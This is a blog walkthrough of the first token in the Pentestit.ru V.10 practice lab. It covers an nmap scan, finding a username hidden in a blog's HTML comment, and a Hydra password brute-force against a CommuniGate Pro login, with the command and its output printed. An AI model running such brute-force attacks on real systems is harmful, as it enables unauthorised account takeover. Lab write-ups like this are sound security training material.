Pentestit.ru V.10 (Part 1) – Token Mail
So this is the 1st tutorial for the 1st token that I achieved.
This was a hard fight and had to get help from different people.
Note: I must say this Token, and the next two I got before my security break, but I’m documenting here now ( Yes, lab is still live, so you still can go for it). Have fun.As usually we start by enumerating our GW:
$ sudo nmap -sV 192.168.101.9 Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-11-27 09:10 WAT Stats: 0:00:17 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 7.00% done; ETC: 09:11 (0:00:53 remaining) Nmap scan report for 192.168.101.9 Host is up (0.18s latency). Not shown: 995 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u6 (protocol 2.0) 25/tcp open smtp CommuniGate Pro mail server 6.0.9 80/tcp open http nginx 1.10.1 443/tcp open http nginx 1.2.1 8100/tcp open caldav
We started by thinking that port 25 was the mail server (172.16.0.7), but after some more enumeration and following other ports, we end up finding some pages.
Port 80 hosts a store (opencart).
Port 443 hosts a blog.
Port 8100 hosts… something interesting:
This is communigate pro, and here we have a login page.
At this stage we started by doing some enumeration and find possible logins.
We came to a list of 2 users (found in blog site):
Scott Locklear - email@example.com Joshua Wise - firstname.lastname@example.org
Running around in circles there was someone who mentioned that the username to get mail token was “hidden” in the source code of blog. And even after that I struggled to find it, after analyze it from top to botton. So r00t gave me a tip: “Batman butler”. And there it was… Alfred in the source code.
<!-- Alfred Modlin said use this template -->
So this had to be the username. So now that we had the user we just need to crack our way in.
We did some enumerationg and we came up with the directory:
Following that path we get a popup for the login session, so now its time crack some nuts 🙂
That was when Hydra came in:
#hydra -v -l email@example.com -P /usr/share/seclists/Passwords/john.txt http-post://192.168.101.9:8100/login/ Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2016-11-29 10:11:14 [DATA] max 16 tasks per 1 server, overall 64 tasks, 3107 login tries (l:1/p:3107), ~3 tries per task [DATA] attacking service http-post on port 8100 [VERBOSE] Resolving addresses ... done [STATUS] 355.00 tries/min, 355 tries in 00:01h, 2752 to do in 00:08h, 16 active [STATUS] 348.00 tries/min, 1044 tries in 00:03h, 2063 to do in 00:06h, 16 active [http-post] host: 192.168.101.9 login: firstname.lastname@example.org password: j****o** [STATUS] attack finished for 192.168.101.9 (waiting for children to complete tests) 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2016-11-29 10:17:49
So we got our password. Now we can login.
When we login we see have 2 email drafts. And one of them is Token:
We also found another email, which has an interesting file as attachment with name gds-authenticator.apk that apparently have some connection with server 172.16.0.1 (ssh-test).
We will see this on the ssh-test token.
Here is a preview: